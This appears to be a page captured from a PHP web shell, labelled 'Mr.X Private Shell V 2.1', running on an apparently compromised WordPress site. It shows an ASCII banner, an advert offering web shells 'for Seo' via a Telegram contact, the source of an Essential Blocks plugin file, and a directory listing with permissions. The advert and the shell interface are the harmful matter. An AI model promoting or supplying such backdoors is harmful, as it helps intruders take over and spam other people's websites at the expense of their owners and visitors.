__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
use EssentialBlocks\Core\Blocks;
use EssentialBlocks\Utils\Settings;
class EssentialAdmin {
/**
* Get the version number
*/
public static function get_version( $path ) {
if ( defined( 'EB_DEV' ) && EB_DEV === true ) {
return filemtime( $path );
} else {
return ESSENTIAL_BLOCKS_VERSION;
}
}
}
class EssentialBlocks {
}
class EBBlocks extends Blocks {
public static function get_blocks() {
return self::get_instance( Settings::get_instance() )->all();
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| API | Folder | 0750 |
|
|
| Admin | Folder | 0750 |
|
|
| Blocks | Folder | 0750 |
|
|
| Core | Folder | 0750 |
|
|
| Dependencies | Folder | 0750 |
|
|
| Integrations | Folder | 0750 |
|
|
| Modules | Folder | 0750 |
|
|
| Traits | Folder | 0750 |
|
|
| Utils | Folder | 0750 |
|
|
| Plugin.php | File | 12.81 KB | 0640 |
|
| blocks.php | File | 42.29 KB | 0640 |
|
| fallback.php | File | 490 B | 0640 |
|